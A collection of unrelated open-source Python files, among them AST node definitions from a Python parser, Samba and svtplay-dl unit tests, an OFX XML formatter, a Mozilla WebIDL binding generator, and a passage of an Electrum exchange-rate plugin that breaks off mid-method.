_locs = expr._locs + ("star_loc",)
class Subscript(expr, beginendloc):
"""
A subscript operation, e.g. ``x[1]``.
:ivar value: (:class:`AST`) object being sliced
:ivar slice: (:class:`slice`) slice
"""
_fields = ("value", "slice", "ctx")
class Tuple(expr, beginendloc):
"""
A tuple, e.g. ``(x,)`` or ``x,y``.
:ivar elts: (list of nodes) elements
"""
_fields = ("elts", "ctx")
class UnaryOp(expr):
"""
An unary operation, e.g. ``+x``.
:ivar op: (:class:`unaryop`) operator
:ivar operand: (:class:`AST`) operand
"""
_fields = ("op", "operand")
class Yield(expr):
"""
A yield expression, e.g. ``yield x``.
:ivar value: (:class:`AST`) yielded value
:ivar yield_loc: location of ``yield``
"""
_fields = ("value",)
_locs = expr._locs + ("yield_loc",)
class YieldFrom(expr):
"""
A yield from expression, e.g. ``yield from x``.
:ivar value: (:class:`AST`) yielded value
:ivar yield_loc: location of ``yield``
:ivar from_loc: location of ``from``
"""
_fields = ("value",)
_locs = expr._locs + ("yield_loc", "from_loc")
# expr_context
# AugLoad
# AugStore
# Del
# Load
# Param
# Store
class keyword(AST, commonloc):
"""
A keyword actual argument, e.g. in ``f(x=1)``.
:ivar arg: (string) name
:ivar value: (:class:`AST`) value
:ivar equals_loc: location of ``=``
"""
_fields = ("arg", "value")
_locs = commonloc._locs + ("arg_loc", "equals_loc")
class mod(AST, commonloc):
"""Base class for modules (groups of statements)."""
_fields = ("body",)
class Expression(mod):
"""A group of statements parsed as if for :func:`eval`."""
class Interactive(mod):
"""A group of statements parsed as if it was REPL input."""
class Module(mod):
"""A group of statements parsed as if it was a file."""
class operator(AST, commonloc):
"""Base class for numeric binary operators."""
class Add(operator):
"""The ``+`` operator."""
class BitAnd(operator):
"""The ``&`` operator."""
class BitOr(operator):
"""The ``|`` operator."""
class BitXor(operator):
"""The ``^`` operator."""
class Div(operator):
    """The ``/`` (division) operator."""
class FloorDiv(operator):
    """The ``//`` (floor division) operator."""
class LShift(operator):
"""The ``<<`` operator."""
class MatMult(operator):
"""The ``@`` operator."""
class Mod(operator):
"""The ``%`` operator."""
class Mult(operator):
"""The ``*`` operator."""
class Pow(operator):
"""The ``**`` operator."""
class RShift(operator):
"""The ``>>`` operator."""
class Sub(operator):
"""The ``-`` operator."""
class slice(AST, commonloc):
"""Base class for slice operations."""
class ExtSlice(slice):
"""
The multiple slice, e.g. in ``x[0:1, 2:3]``.
Note that multiple slices with only integer indexes
will appear as instances of :class:`Index`.
:ivar dims: (:class:`slice`) sub-slices
"""
_fields = ("dims",)
class Index(slice):
"""
The index, e.g. in ``x[1]`` or ``x[1, 2]``.
:ivar value: (:class:`AST`) index
"""
_fields = ("value",)
class Slice(slice):
    """
    The slice, e.g. in ``x[0:1]`` or ``x[0:1:2]``.

    :ivar lower: (:class:`AST`) lower bound, if any
    :ivar upper: (:class:`AST`) upper bound, if any
    :ivar step: (:class:`AST`) iteration step, if any
    :ivar bound_colon_loc: location of the first colon
    :ivar step_colon_loc: location of the second colon, if any
    """
    _fields = ("lower", "upper", "step")
    _locs = slice._locs + ("bound_colon_loc", "step_colon_loc")
class stmt(AST, commonloc):
"""Base class for statement nodes."""
class Assert(stmt, keywordloc):
"""
The ``assert x, msg`` statement.
:ivar test: (:class:`AST`) condition
:ivar msg: (:class:`AST`) message, if any
"""
_fields = ("test", "msg")
class Assign(stmt):
"""
The ``=`` statement, e.g. in ``x = 1`` or ``x = y = 1``.
:ivar targets: (list of assignable :class:`AST`) left-hand sides
:ivar value: (:class:`AST`) right-hand side
:ivar op_locs: location of equality signs corresponding to ``targets``
"""
_fields = ("targets", "value")
_locs = stmt._locs + ("op_locs",)
class AugAssign(stmt):
"""
The operator-assignment statement, e.g. ``+=``.
:ivar target: (assignable :class:`AST`) left-hand side
:ivar op: (:class:`operator`) operator
:ivar value: (:class:`AST`) right-hand side
"""
_fields = ("target", "op", "value")
class Break(stmt, keywordloc):
"""The ``break`` statement."""
class ClassDef(stmt, keywordloc):
"""
The ``class x(z, y):· t`` (2.6) or
``class x(y, z=1, *t, **u):· v`` (3.0) statement.
:ivar name: (string) name
:ivar bases: (list of :class:`AST`) base classes
:ivar keywords: (list of :class:`keyword`) keyword arguments; **emitted since 3.0**
:ivar starargs: (:class:`AST`) splat argument (if any), e.g. in ``*x``; **emitted since 3.0**
:ivar kwargs: (:class:`AST`) keyword splat argument (if any), e.g. in ``**x``; **emitted since 3.0**
:ivar body: (list of :class:`AST`) body
:ivar decorator_list: (list of :class:`AST`) decorators
:ivar keyword_loc: location of ``class``
:ivar name_loc: location of name
:ivar lparen_loc: location of ``(``, if any
:ivar star_loc: location of ``*``, if any; **emitted since 3.0**
:ivar dstar_loc: location of ``**``, if any; **emitted since 3.0**
:ivar rparen_loc: location of ``)``, if any
:ivar colon_loc: location of ``:``
:ivar at_locs: locations of decorator ``@``
"""
_fields = ("name", "bases", "keywords", "starargs", "kwargs", "body", "decorator_list")
_locs = keywordloc._locs + ("name_loc", "lparen_loc", "star_loc", "dstar_loc", "rparen_loc",
"colon_loc", "at_locs")
class Continue(stmt, keywordloc):
"""The ``continue`` statement."""
class Delete(stmt, keywordloc):
"""
The ``del x, y`` statement.
:ivar targets: (list of :class:`Name`)
"""
_fields = ("targets",)
class Exec(stmt, keywordloc):
"""
The ``exec code in locals, globals`` statement.
**Emitted until 3.0.**
:ivar body: (:class:`AST`) code
:ivar locals: (:class:`AST`) locals
:ivar globals: (:class:`AST`) globals
:ivar keyword_loc: location of ``exec``
:ivar in_loc: location of ``in``
"""
_fields = ("body", "locals", "globals")
_locs = keywordloc._locs + ("in_loc",)
class Expr(stmt):
"""
An expression in statement context. The value of expression is discarded.
:ivar value: (:class:`expr`) value
"""
_fields = ("value",)
class For(stmt, keywordloc):
"""
The ``for x in y:· z·else:· t`` statement.
:ivar target: (assignable :class:`AST`) loop variable
:ivar iter: (:class:`AST`) loop collection
:ivar body: (list of :class:`AST`) code for every iteration
:ivar orelse: (list of :class:`AST`) code if empty
:ivar keyword_loc: location of ``for``
:ivar in_loc: location of ``in``
:ivar for_colon_loc: location of colon after ``for``
:ivar else_loc: location of ``else``, if any
:ivar else_colon_loc: location of colon after ``else``, if any
"""
_fields = ("target", "iter", "body", "orelse")
_locs = keywordloc._locs + ("in_loc", "for_colon_loc", "else_loc", "else_colon_loc")
class FunctionDef(stmt, keywordloc):
"""
The ``def f(x):· y`` (2.6) or ``def f(x) -> t:· y`` (3.0) statement.
:ivar name: (string) name
:ivar args: (:class:`arguments`) formal arguments
:ivar returns: (:class:`AST`) return type annotation; **emitted since 3.0**
:ivar body: (list of :class:`AST`) body
:ivar decorator_list: (list of :class:`AST`) decorators
:ivar keyword_loc: location of ``def``
:ivar name_loc: location of name
:ivar arrow_loc: location of ``->``, if any; **emitted since 3.0**
:ivar colon_loc: location of ``:``, if any
:ivar at_locs: locations of decorator ``@``
"""
_fields = ("name", "args", "returns", "body", "decorator_list")
_locs = keywordloc._locs + ("name_loc", "arrow_loc", "colon_loc", "at_locs")
class Global(stmt, keywordloc):
"""
The ``global x, y`` statement.
:ivar names: (list of string) names
:ivar name_locs: locations of names
"""
_fields = ("names",)
_locs = keywordloc._locs + ("name_locs",)
class If(stmt, keywordloc):
"""
The ``if x:· y·else:· z`` or ``if x:· y·elif: z· t`` statement.
:ivar test: (:class:`AST`) condition
:ivar body: (list of :class:`AST`) code if true
:ivar orelse: (list of :class:`AST`) code if false
:ivar if_colon_loc: location of colon after ``if`` or ``elif``
:ivar else_loc: location of ``else``, if any
:ivar else_colon_loc: location of colon after ``else``, if any
"""
_fields = ("test", "body", "orelse")
_locs = keywordloc._locs + ("if_colon_loc", "else_loc", "else_colon_loc")
class Import(stmt, keywordloc):
"""
The ``import x, y`` statement.
:ivar names: (list of :class:`alias`) names
"""
_fields = ("names",)
class ImportFrom(stmt, keywordloc):
"""
The ``from ...x import y, z`` or ``from x import (y, z)`` or
``from x import *`` statement.
:ivar names: (list of :class:`alias`) names
:ivar module: (string) module name, if any
:ivar level: (integer) amount of dots before module name
:ivar keyword_loc: location of ``from``
:ivar dots_loc: location of dots, if any
:ivar module_loc: location of module name, if any
:ivar import_loc: location of ``import``
:ivar lparen_loc: location of ``(``, if any
:ivar rparen_loc: location of ``)``, if any
"""
_fields = ("names", "module", "level")
_locs = keywordloc._locs + ("dots_loc", "module_loc", "import_loc", "lparen_loc", "rparen_loc")
class Nonlocal(stmt, keywordloc):
"""
The ``nonlocal x, y`` statement.
**Emitted since 3.0.**
:ivar names: (list of string) names
:ivar name_locs: locations of names
"""
_fields = ("names",)
_locs = keywordloc._locs + ("name_locs",)
class Pass(stmt, keywordloc):
"""The ``pass`` statement."""
class Print(stmt, keywordloc):
"""
The ``print >>x, y, z,`` statement.
**Emitted until 3.0 or until print_function future flag is activated.**
:ivar dest: (:class:`AST`) destination stream, if any
:ivar values: (list of :class:`AST`) values to print
:ivar nl: (boolean) whether to print newline after values
:ivar dest_loc: location of ``>>``
"""
_fields = ("dest", "values", "nl")
_locs = keywordloc._locs + ("dest_loc",)
class Raise(stmt, keywordloc):
"""
The ``raise exc, arg, traceback`` (2.6) or
or ``raise exc from cause`` (3.0) statement.
:ivar exc: (:class:`AST`) exception type or instance
:ivar cause: (:class:`AST`) cause of exception, if any; **emitted since 3.0**
:ivar inst: (:class:`AST`) exception instance or argument list, if any; **emitted until 3.0**
:ivar tback: (:class:`AST`) traceback, if any; **emitted until 3.0**
:ivar from_loc: location of ``from``, if any; **emitted since 3.0**
"""
_fields = ("exc", "cause", "inst", "tback")
_locs = keywordloc._locs + ("from_loc",)
class Return(stmt, keywordloc):
"""
The ``return x`` statement.
:ivar value: (:class:`AST`) return value, if any
"""
_fields = ("value",)
class Try(stmt, keywordloc):
"""
The ``try:· x·except y:· z·else:· t`` or
``try:· x·finally:· y`` statement.
:ivar body: (list of :class:`AST`) code to try
:ivar handlers: (list of :class:`ExceptHandler`) exception handlers
:ivar orelse: (list of :class:`AST`) code if no exception
:ivar finalbody: (list of :class:`AST`) code to finalize
:ivar keyword_loc: location of ``try``
:ivar try_colon_loc: location of ``:`` after ``try``
:ivar else_loc: location of ``else``
:ivar else_colon_loc: location of ``:`` after ``else``
:ivar finally_loc: location of ``finally``
:ivar finally_colon_loc: location of ``:`` after ``finally``
"""
_fields = ("body", "handlers", "orelse", "finalbody")
_locs = keywordloc._locs + ("try_colon_loc", "else_loc", "else_colon_loc",
"finally_loc", "finally_colon_loc",)
class While(stmt, keywordloc):
"""
The ``while x:· y·else:· z`` statement.
:ivar test: (:class:`AST`) condition
:ivar body: (list of :class:`AST`) code for every iteration
:ivar orelse: (list of :class:`AST`) code if empty
:ivar keyword_loc: location of ``while``
:ivar while_colon_loc: location of colon after ``while``
:ivar else_loc: location of ``else``, if any
:ivar else_colon_loc: location of colon after ``else``, if any
"""
_fields = ("test", "body", "orelse")
_locs = keywordloc._locs + ("while_colon_loc", "else_loc", "else_colon_loc")
class With(stmt, keywordloc):
    """
    The ``with x as y:· z`` statement.

    :ivar items: (list of :class:`withitem`) bindings
    :ivar body: (list of :class:`AST`) body
    :ivar keyword_loc: location of ``with``
    :ivar colon_loc: location of ``:``
    """
    # Child nodes of the statement.
    _fields = ("items", "body")
    _locs = keywordloc._locs + ("colon_loc",)
class unaryop(AST, commonloc):
    """Base class for unary numeric and boolean operators."""
# Concrete unary operator nodes; each carries only its source location.
class Invert(unaryop):
    """The ``~`` operator."""
class Not(unaryop):
    """The ``not`` operator."""
class UAdd(unaryop):
    """The unary ``+`` operator."""
class USub(unaryop):
    """The unary ``-`` operator."""
class withitem(AST, commonloc):
    """
    The ``x as y`` clause in ``with x as y:``.

    :ivar context_expr: (:class:`AST`) context
    :ivar optional_vars: (assignable :class:`AST`) context binding, if any
    :ivar as_loc: location of ``as``, if any
    """
    # Child nodes; optional_vars is absent for a plain ``with x:``.
    _fields = ("context_expr", "optional_vars")
    _locs = commonloc._locs + ("as_loc",)
| google/grumpy | third_party/pythonparser/ast.py | Python | apache-2.0 | 26,727 | 0.005131 |
#! /usr/bin/env python
# @brief Script to run appropriate tests.
import os
import distutils.core
from shutil import rmtree, copyfile
"""Available tests dictionary in the format no_of_test : name_of_test"""
# Keys are the numbers the user types at the prompt; each maps to a short
# description of the configuration stored as ./Tests/test<no>.
tests = {0:"default Generator.dat with lot of comments and explanations",
         1:"RHIC pt_pi, eta_pi; tecm = 200GeV; Lambda2=1",
         2:"RHIC pt_pi, eta_pi, t1, t2; tecm = 200GeV; Lambda2=1",
         3:"RHIC pt_pi, eta_pi, t1, t2; tecm = 200GeV; Lambda2=1.6",
         4:"RHIC pt_pi, eta_pi; tecm = 500GeV; Lambda2=1",
         5:"RHIC pt_pi, eta_pi, t1, t2; tecm = 500GeV; Lambda2=1",
         6:"RHIC pt_pi, eta_pi, t1, t2; tecm = 500GeV; Lambda2=1.6",
         7:"LHC pt_pi, eta_pi; tecm = 7TeV, 1st; Lambda2=1.2",
         8:"LHC pt_pi, eta_pi; tecm = 7TeV, 1st; Lambda2=1.6",
         9:"LHC pt_pi, eta_pi; tecm = 7TeV, 2nd; Lambda2=1.2",
         10:"LHC pt_pi, eta_pi; tecm = 7TeV, 2nd; Lambda2=1.6",
         11:"LHC pt_K, eta_K; tecm = 7TeV, 1st; Lambda2=1.2",
         12:"LHC pt_K, eta_K; tecm = 7TeV, 1st; Lambda2=1.6",
         13:"LHC pt_K, eta_K; tecm = 7TeV, 2nd; Lambda2=1.2",
         14:"LHC pt_K, eta_K; tecm = 7TeV, 2nd; Lambda2=1.6",
         15:"2to5; y_pi, tecm = 200GeV",
         16:"CPS, N=5, y_pi, tecm = 200GeV",
         17:"2to5; y_pi, t, tecm = 200GeV",
         18:"CPS, N=5, y_pi, t, tecm = 200GeV",
         19:"CPS, N=5, Exploration Cuts, y_pi, t, tecm = 200GeV",
         20:"RHIC pt_pi, eta_pi, t1, t2; tecm = 200GeV; Lambda2=1.6; LS method of Phase Space generation",
         21:"RHIC pt_pi, eta_pi, t1, t2; tecm = 200GeV; Lambda2=1.6; 2toN (N=4) method of Phase Space generation",
         22:"RHIC pt_pi, eta_pi, t1, t2; tecm = 200GeV; Lambda2=1.6; nCells = 1000 = nSampl, y in [-8;8]",
         23:"RHIC pt_pi, eta_pi, t1, t2; tecm = 200GeV; Lambda2=1.6; nCells = 10000, nSampl = 1000, y in [-8;8]",
         24:"RHIC pt_pi, eta_pi, t1, t2; tecm = 200GeV; Lambda2=1.6; nCells = 10000, nSampl = 10000, y in [-8;8]",
         25:"RHIC pt_pi, eta_pi, t1, t2; tecm = 200GeV; Lambda2=1.6; nCells = 10000, nSampl = 1000, y in [-2;2]",
         26:"RHIC pt_pi, eta_pi, t1, t2; tecm = 200GeV; Lambda2=1.6; nCells = 10000 = nSampl, y in [-2;2]"
         }
def prepareTest( number, testDir = './Tests', testName = 'test', configFile = 'Generator.dat' ):
    """Prepare the generator configuration by picking one test file from testDir.

    The current configFile is first backed up as "OLD" + configFile, then
    overwritten with the selected test configuration.

    @param number number of the test; selects the file testName + str(number)
    @param testDir dir containing tests
    @param testName basename of test
    @param configFile configuration file for generator
    @return the directory the test configuration was taken from
    """
    # Save old config file so the user's own setup is not lost.
    copyfile(configFile, "OLD" + configFile)
    # Copy the selected test configuration over the active one.
    fromDirectory = os.path.join(testDir, testName + str(number))
    copyfile(fromDirectory, configFile)
    return testDir
def rmDir(directory="./"):
    """Recursively delete *directory* together with everything inside it.

    @param directory base directory for project
    """
    rmtree(directory)
def runMake(option, runDir='./'):
    """Invoke ``make`` with a single target in the given directory.

    @param option option for make
    @param runDir directory in which make will be executed
    """
    command = 'make -C ' + runDir + ' ' + option
    os.system(command)
def showTests(testDict):
    """Print a framed listing with one line per available test.

    @param testDict dictionary with tests in the format no_of_test : name_of_test
    """
    separator = "#########################"
    print(separator)
    print("AVAIBLE TESTS:")
    print(separator)
    for number, description in testDict.items():
        print(str(number) + ' -- ' + str(description))
    print(separator)
def pickTest( testDict ):
    """Allows user to pick option from the keys of dictionary and returns it.

    Keeps prompting until the user enters one of the (integer) keys of
    testDict.

    @param testDict dictionary with tests in the format no_of_test : name_of_test
    @return the chosen key of testDict (an int)
    """
    while True:
        showTests(testDict)
        entered = input("Enter option: ")
        print ("you entered " + str(entered))
        # Under Python 3, input() returns a string while the dictionary
        # keys are ints; without this conversion no entry could ever match
        # and the loop would never terminate.
        try:
            input_var = int(entered)
        except ValueError:
            continue
        if input_var in testDict:
            return input_var
def main():
    """Simple test suite driver for GenEx: lets the user pick a test,
    prepares the generator configuration for it, runs it through make and
    finally cleans the working directory."""
    chosen = pickTest(tests)
    print("Preparing generator...")
    prepareTest(chosen)
    print("...DONE")
    print("Start test...")
    runMake('run')
    print("...DONE")
    print("Cleaning dir...")
    runMake('clean')
    print("...DONE")
if __name__ == "__main__":
    main()
| rkycia/GenEx | test.py | Python | gpl-3.0 | 4,308 | 0.036444 |
#!/usr/bin/python
# ex:ts=4:sw=4:sts=4:et
# -*- tab-width: 4; c-basic-offset: 4; indent-tabs-mode: nil -*-
# The unittest framwork doesn't play nice with pylint:
# pylint: disable-msg=C0103
from __future__ import absolute_import
import unittest
from svtplay_dl.service.oppetarkiv import OppetArkiv
from svtplay_dl.service.tests import HandlesURLsTestMixin
class handlesTest(unittest.TestCase, HandlesURLsTestMixin):
    """URL-dispatch tests for the OppetArkiv service, generated by HandlesURLsTestMixin."""
    # Service class exercised by the mixin's generated tests.
    service = OppetArkiv
    # URLs the service must claim ("ok") and must not claim ("bad").
    urls = {"ok": ["http://www.oppetarkiv.se/video/1129844/jacobs-stege-avsnitt-1-av-1"], "bad": ["http://www.svtplay.se/video/1090393/del-9"]}
| olof/svtplay-dl | lib/svtplay_dl/service/tests/oppetarkiv.py | Python | mit | 591 | 0.001692 |
#!/usr/bin/env python
# Unix SMB/CIFS implementation.
# Copyright (C) Jelmer Vernooij <jelmer@samba.org> 2007-2008
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
"""Samba Python tests."""
import ldb
import os
import samba
from samba.tests import TestCase, TestCaseInTempDir
class SubstituteVarTestCase(TestCase):
    """Unit tests for samba.substitute_var() and samba.check_all_substituted()."""
    def test_empty(self):
        # Substituting into an empty string yields an empty string.
        self.assertEquals("", samba.substitute_var("", {}))
    def test_nothing(self):
        # Text without ${...} markers is returned unchanged.
        self.assertEquals("foo bar",
            samba.substitute_var("foo bar", {"bar": "bla"}))
    def test_replace(self):
        # A known variable is replaced by its value.
        self.assertEquals("foo bla",
            samba.substitute_var("foo ${bar}", {"bar": "bla"}))
    def test_broken(self):
        # An unterminated ${... marker is left as-is rather than raising.
        self.assertEquals("foo ${bdkjfhsdkfh sdkfh ",
            samba.substitute_var("foo ${bdkjfhsdkfh sdkfh ", {"bar": "bla"}))
    def test_unknown_var(self):
        # Unknown variables are preserved verbatim.
        self.assertEquals("foo ${bla} gsff",
            samba.substitute_var("foo ${bla} gsff", {"bar": "bla"}))
    def test_check_all_substituted(self):
        # No markers -> passes silently; a leftover ${FOOBAR} must raise.
        samba.check_all_substituted("nothing to see here")
        self.assertRaises(Exception, samba.check_all_substituted,
            "Not subsituted: ${FOOBAR}")
class LdbExtensionTests(TestCaseInTempDir):
    """Tests for the searchone() convenience helper on samba.Ldb."""
    def test_searchone(self):
        path = self.tempdir + "/searchone.ldb"
        l = samba.Ldb(path)
        try:
            l.add({"dn": "foo=dc", "bar": "bla"})
            # searchone() returns the value of the requested attribute for
            # the single matching record.
            self.assertEquals("bla",
                l.searchone(basedn=ldb.Dn(l, "foo=dc"), attribute="bar"))
        finally:
            # Drop the handle before removing the database file.
            del l
            os.unlink(path)
| wimberosa/samba | source4/scripting/python/samba/tests/core.py | Python | gpl-3.0 | 2,175 | 0.004598 |
#coding: utf-8
# Copyright 2005-2010 Wesabe, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ofx.document - abstract OFX document.
#
import xml.sax.saxutils as sax
class Document:
    """Abstract OFX document.

    Concrete documents are expected to provide ``self.parse_dict``: a
    mapping with a "header" entry (OFX header key/value pairs) and a
    "body" entry whose "OFX" element is the parsed tag tree.  This class
    can re-serialize that structure as an OFX 2.0 XML document.
    """
    def as_xml(self, original_format=None, date_format=None):
        """Formats this document as an OFX 2.0 XML document.

        @param original_format if given, recorded in an XML comment noting
               the format this document was converted from.
        @param date_format if given, recorded in an XML comment noting the
               date format used by the source document.
        @return the document serialized as an OFX 2.0 XML string.
        """
        # NOTE: Encoding in OFX, particularly in OFX 1.02,
        # is kind of a mess. The OFX 1.02 spec talks about "UNICODE"
        # as a supported encoding, which the OFX 2.0 spec has
        # back-rationalized to "UTF-8". The "US-ASCII" encoding is
        # given as "USASCII". Yet the 1.02 spec acknowledges that
        # not everyone speaks English nor uses UNICODE, so they let
        # you throw any old encoding in there you'd like. I'm going
        # with the idea that if the most common encodings are named
        # in an OFX file, they should be translated to "real" XML
        # encodings, and if no encoding is given, UTF-8 (which is a
        # superset of US-ASCII) should be assumed; but if a named
        # encoding other than USASCII or 'UNICODE' is given, that
        # should be preserved. I'm also adding a get_encoding()
        # method so that we can start to survey what encodings
        # we're actually seeing, and use that to maybe be smarter
        # about this in the future.
        # Forcing encoding to UTF-8 for now (see note above).
        encoding = "UTF-8"
        header = self.parse_dict["header"]
        pieces = ['<?xml version="1.0" encoding="%s"?>\n' % encoding]
        pieces.append('<?OFX OFXHEADER="200" VERSION="200" '
                      'SECURITY="%s" OLDFILEUID="%s" NEWFILEUID="%s"?>\n' %
                      (header["SECURITY"],
                       header["OLDFILEUID"],
                       header["NEWFILEUID"]))
        if original_format is not None:
            pieces.append("<!-- Converted from: %s -->\n" % original_format)
        if date_format is not None:
            pieces.append("<!-- Date format was: %s -->\n" % date_format)
        taglist = self.parse_dict["body"]["OFX"][0].asList()
        pieces.append(self._format_xml(taglist))
        return "".join(pieces)
    def _format_xml(self, mylist, indent=0):
        """Recursively render one parse-tree node as indented XML.

        A node is a list ``[tag, child1, child2, ...]`` where each child is
        either a nested list (a sub-element) or a string (text content).
        Unlike the previous implementation, the input list is NOT modified.

        @param mylist parse-tree node to render
        @param indent number of spaces this node is indented by
        @return the XML fragment as a string
        """
        indentstring = " " * indent
        tag = mylist[0]
        children = mylist[1:]
        if len(children) > 0 and isinstance(children[0], list):
            # Aggregate node: render each child element two spaces deeper.
            pieces = ["%s<%s>\n" % (indentstring, tag)]
            for child in children:
                pieces.append(self._format_xml(child, indent=indent + 2))
            pieces.append("%s</%s>\n" % (indentstring, tag))
            return "".join(pieces)
        elif len(children) > 0:
            # Leaf node. Unescape then reescape so we don't wind up with
            # double-escaped entities like '&amp;lt;', oy.
            value = sax.escape(sax.unescape(children[0]))
            return "%s<%s>%s</%s>\n" % (indentstring, tag, value, tag)
        # A tag with no content renders as nothing (historic behavior).
        return ""
| henriquebastos/fixofx | fixofx/ofx/document.py | Python | apache-2.0 | 3,289 | 0.001216 |
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
import os
import cPickle
import WebIDL
from Configuration import *
from Codegen import CGBindingRoot, replaceFileIfChanged
# import Codegen in general, so we can set a variable on it
import Codegen
def generate_binding_header(config, outputprefix, webidlfile):
    """
    Generate the C++ header for the bindings of one WebIDL file.

    |config| Is the configuration object.
    |outputprefix| is a prefix to use for the header guards and filename.
    |webidlfile| is the path of the WebIDL file the bindings come from.
    """
    filename = outputprefix + ".h"
    root = CGBindingRoot(config, outputprefix, webidlfile)
    # Only rewrite the file (and report) when the content actually changed,
    # so unchanged outputs do not trigger needless rebuilds.
    if replaceFileIfChanged(filename, root.declare()):
        print "Generating binding header: %s" % (filename)
def generate_binding_cpp(config, outputprefix, webidlfile):
    """
    Generate the C++ implementation file for the bindings of one WebIDL file.

    |config| Is the configuration object.
    |outputprefix| is a prefix to use for the filename.
    |webidlfile| is the path of the WebIDL file the bindings come from.
    """
    filename = outputprefix + ".cpp"
    root = CGBindingRoot(config, outputprefix, webidlfile)
    # Only rewrite the file (and report) when the content actually changed,
    # so unchanged outputs do not trigger needless rebuilds.
    if replaceFileIfChanged(filename, root.define()):
        print "Generating binding implementation: %s" % (filename)
def main():
    """Entry point: generate either the binding header or the binding
    implementation ("cpp") for a single WebIDL file."""
    # Parse arguments.
    from optparse import OptionParser
    usagestring = "usage: %prog [header|cpp] configFile outputPrefix webIDLFile"
    o = OptionParser(usage=usagestring)
    o.add_option("--verbose-errors", action='store_true', default=False,
                 help="When an error happens, display the Python traceback.")
    (options, args) = o.parse_args()
    if len(args) != 4 or (args[0] != "header" and args[0] != "cpp"):
        o.error(usagestring)
    buildTarget = args[0]
    configFile = os.path.normpath(args[1])
    outputPrefix = args[2]
    webIDLFile = os.path.normpath(args[3])
    # Load the parsing results.
    # NOTE(review): ParserResults.pkl is presumably produced by an earlier
    # WebIDL-parsing build step -- confirm against the build system.
    f = open('ParserResults.pkl', 'rb')
    parserData = cPickle.load(f)
    f.close()
    # Create the configuration data.
    config = Configuration(configFile, parserData)
    # Generate the prototype classes.
    if buildTarget == "header":
        generate_binding_header(config, outputPrefix, webIDLFile);
    elif buildTarget == "cpp":
        generate_binding_cpp(config, outputPrefix, webIDLFile);
    else:
        assert False # not reached
if __name__ == '__main__':
    main()
| sergecodd/FireFox-OS | B2G/gecko/dom/bindings/BindingGen.py | Python | apache-2.0 | 2,361 | 0.003388 |
from PyQt4.QtGui import *
from PyQt4.QtCore import *
import datetime
import decimal
import httplib
import json
import threading
import re
from decimal import Decimal
from electrum.plugins import BasePlugin
from electrum.i18n import _
from electrum_gui.qt.util import *
# Names of the supported exchange-rate providers, as offered in the
# plugin's settings dialog.
EXCHANGES = ["BitcoinAverage",
             "BitcoinVenezuela",
             "BitPay",
             "Blockchain",
             "BTCChina",
             "CaVirtEx",
             "Coinbase",
             "CoinDesk",
             "LocalBitcoins",
             "Winkdex"]
class Exchanger(threading.Thread):
    """Background thread that polls the configured exchange for BTC fiat
    rates roughly every 150 seconds and caches them in
    ``quote_currencies`` for the GUI thread to read."""
    def __init__(self, parent):
        threading.Thread.__init__(self)
        self.daemon = True
        self.parent = parent
        # Mapping of currency code -> rate; None until the first poll succeeds.
        self.quote_currencies = None
        # Protects quote_currencies, which is read from the GUI thread.
        self.lock = threading.Lock()
        # Setting this event forces an immediate re-poll (e.g. after the
        # user switches exchanges in the settings dialog).
        self.query_rates = threading.Event()
        self.use_exchange = self.parent.config.get('use_exchange', "Blockchain")
        self.parent.exchanges = EXCHANGES
        self.parent.currencies = ["EUR", "GBP", "USD"]
        self.parent.win.emit(SIGNAL("refresh_exchanges_combo()"))
        self.parent.win.emit(SIGNAL("refresh_currencies_combo()"))
        self.is_running = False
    def get_json(self, site, get_string):
        """HTTPS-GET *get_string* from *site* and return the decoded JSON.

        Raises on connection failure, on a 404 response, and on malformed
        JSON; callers catch failures broadly and simply skip the update.
        """
        connection = httplib.HTTPSConnection(site)
        try:
            connection.request("GET", get_string)
            resp = connection.getresponse()
            if resp.reason == httplib.responses[httplib.NOT_FOUND]:
                # The previous code used a bare `raise` here, which is
                # itself an error when no exception is active; raise an
                # explicit exception instead.
                raise Exception("%s not found on %s" % (get_string, site))
            json_resp = json.loads(resp.read())
        finally:
            # Always release the socket; the previous implementation
            # leaked one connection per poll.
            connection.close()
        return json_resp
    def exchange(self, btc_amount, quote_currency):
        """Convert *btc_amount* (in BTC) to *quote_currency*.

        Returns None when no rate for that currency is known yet.
        """
        with self.lock:
            if self.quote_currencies is None:
                return None
            quote_currencies = self.quote_currencies.copy()
        if quote_currency not in quote_currencies:
            return None
        if self.use_exchange == "CoinDesk":
            # CoinDesk rates are fetched on demand, once per conversion.
            try:
                resp_rate = self.get_json('api.coindesk.com', "/v1/bpi/currentprice/" + str(quote_currency) + ".json")
            except Exception:
                return
            return btc_amount * decimal.Decimal(str(resp_rate["bpi"][str(quote_currency)]["rate_float"]))
        return btc_amount * decimal.Decimal(quote_currencies[quote_currency])
    def stop(self):
        # Asks the polling loop to exit after its current wait.
        self.is_running = False
    def update_rate(self):
        """Fetch fresh rates from the currently configured exchange."""
        self.use_exchange = self.parent.config.get('use_exchange', "Blockchain")
        update_rates = {
            "BitcoinAverage": self.update_ba,
            "BitcoinVenezuela": self.update_bv,
            "BitPay": self.update_bp,
            "Blockchain": self.update_bc,
            "BTCChina": self.update_CNY,
            "CaVirtEx": self.update_cv,
            "CoinDesk": self.update_cd,
            "Coinbase": self.update_cb,
            "LocalBitcoins": self.update_lb,
            "Winkdex": self.update_wd,
        }
        try:
            update_rates[self.use_exchange]()
        except KeyError:
            return
    def run(self):
        # Poll every 150 seconds, or sooner when query_rates is set.
        self.is_running = True
        while self.is_running:
            self.query_rates.clear()
            self.update_rate()
            self.query_rates.wait(150)
    def update_cd(self):
        # CoinDesk: only the list of supported currencies is cached here;
        # actual rates are fetched per conversion in exchange().
        try:
